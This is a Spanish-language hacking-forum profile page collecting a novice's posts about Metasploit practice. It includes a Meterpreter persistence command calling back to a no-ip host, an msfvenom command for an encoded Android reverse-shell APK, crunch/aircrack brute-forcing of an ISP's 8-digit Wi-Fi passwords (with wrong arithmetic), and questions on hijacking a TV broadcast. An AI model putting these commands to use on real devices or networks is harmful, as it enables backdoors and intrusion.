Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - kilerpi

#1
Bueno amigos les comento mi problema, yo uso kali linux para practicar pentesting, tengo algunos problemas cuando quiero instalar una persistencia en el computador objetivo para poderme conectar siempre, uso este comando "run persistence -U -i 5 -p 1717 -r (mi dominio en noip)" luego le doy enter y efectivamente me dice que la persistencia se ha instalado correctamente entonces yo en la session meterpreter que tengo abierta escribo reboot para reiniciar la maquina atacada  luego abro una nueva ventana de metasploit framework y escribo "use exploit/multi/hanlder" y luego cuando estoy en el exploit escribo "set LHOST (mi dominio en no ip)" y luego pongo "set LPORT 1717" entonces le doy run y me sale esto

  • Started reverse TCP handler on 192.168.1.4:1717
  • Starting the payload handler...

    lo que quiere decir que esta esperando la conexión que ya antes configure con persistencia, pero nunca se conecta siempre se queda asi, yo supongo que si configure bien el cliente de no ip ya que si abro una nueva consola en kali linux y realizo un ping a mi dominio no ip efectivamente me devuelve mi ip, me podrian deicr en que me estoy equivocando ? poruqe no logro que la persistencia funcione si cuando corro el comando para instalar la persistencia me me sale que se ha instalado correctamente ?
    antes usaba veil framework para generar los payloads crei que esa era la razon por la que no me funcionaba la persistencia pero acabo de generar uno con msfvenom y tampoco funciona la persistencia.
#2
buenas amigos me puse a preguntar y me llego a la cabeza como hackearias una estacion televisiva, como este mundo del hacking no es costante ni sigue lineas cada uno de ustedes debe de tener sus propios metodos, me gustaria que me cuenten como lo hicieran, y una vez tomado el control de la señal transmitida en los televisores que hicieran?
#3
Gracias amigo por la correcion en las matematicas XD soyalgo malo en eso, bueno el caso es que por segundo soy capaz de probar al rededor de 400 claves bueno yo no en realidad mi computadora, despues de probar muchos comandos en crunch cree el diccionario el comando es "crunch 8 8 0123456789" bueno y uso aircrack para poder probar muchas contraseñas al mismo tiempo de todas formas gracias amigo ^-^ (debo practicar matematicas :v)
#4
Buenas noches amigos, estuve pensado sobre crunch el creador de diccionarios para ataques por fuerza bruta y bueno pense y pense, y se me ocurrio algo que quiero probar, casi todas las personas de mi ciudad reciven internet del ISP llamado "Centro nacional de telecomunicaciones" o en sus siglas "CNT" bueno el caso es que cuando losl "tecnicos" de la empresa CNT instala  la conexión a internet siempre configura una contraseña de 8 digistos esta contraseña es aleatoria por ejemplo puede ser como esta "25634728" siempre llevando 8 digitos,  ahora todas las combinaciones posibles de 8 digitos son 40320

(obtenemos todas las contraseñas posibles multiplicando 8x7x6x5x4x3x2x1)

ya dejando de una lado las matematicas y volviendo a crunch, mi pregunta es la siguiente puedo generar un dicionario que tenga todas esas 40320 combinaciones posibles? y si lo puedo crear cual seria el comando ?
#5
Muy buenas amigos,  ya puedo realizar backdoors en lan con metasploit, ahora quisiera dar el paso a wan osea fuera de la red lan, el caso es que yo no puedo acceder a mi router porque no se el nombre de usuario ni password (aclaro que las contraseñas no son las que el router trae por defecto) bueno la gente me dira "oye reinicia el router  listo" pero no lo puedo hacer porque no tengo acceso fisico a mi router, entonces estuve pensando y lo unico que se me vino a la cabeza fue escanear los puertos abiertos que tiene mi router con nmap bueno mi router tiene 3 puertoscon protocolos  tcp que salen abiertos y son los siguientes: 80,8080,1900
mi pregunta es la siguiente puedo usar alguno de esos puertos para crear un backdoor que funcione fuera de lan ?
#6
Hacking / Re: msfvenom...
28 Abril 2016, 20:44 PM
Buenos dias amigo :D, bueno en primer lugar debes de saber que el comando msfvenom es la conbinacion de comandos para poder crear un payload en este caso el "android/meterpreter/reverse_tcp" y al mismo tiempo poder ponerle al apk creador un encoder para que el archivo no fuera facil de detectar, intenta este comando en la consola root de tu SO con el que estes trabajando: "msfvenom -p android/meterpreter/reverse_tcp LHOST=aqui pon tu direccion ip LPORT=aqui pon el puerto que vallas a usar -e x86/shikata_ga_nai -f apk >exploit.apk "
Bueno amigo recuerdo quitarle las comillas al comando y una cosa no estoy seguro si el encoder shikata ga nai sirve para android yo supongo que debe de servir pero en caso de que no sirve averigua en internet los encoders disponibles para backdoors android , en si basicamente ese es el comando que debes usar
#7
Bugs y Exploits / Re: Metasploit (windows)
28 Abril 2016, 09:08 AM
Hey, Intenta en vez de comensar el comando con "msfpayload" usa "msfvenom" el resto del comando es igual
#8
Buenos dias amigos, tengo un problema, intento hacer prueba de penetracion de sistemas desde una maquina virtual que contiene kali linux a mi pc fisica que contiene windows 7, aun soy principiante, tengo entendido que antes de ejecutar metasploit, debo iniciar sus servicios usando este comando "service postgresql start" en la consola, al digitar este comando me sale lo siguiente : "failed to start postgersql .service: Unit postgersql .service failed to load: no such file or directory." que debo de hacer para solucionar ese problema estaria muy agradecido si me ayudaran
#9
Muchas gracias amigo! :D
#10
Y hice el escaneo de la ip con nmap incluso tengo los puertos abiertos y cerrados, ahora lo que me gustaria saber es que puedo hacer con eso usando metasploit desde una unidad linux (kali linx)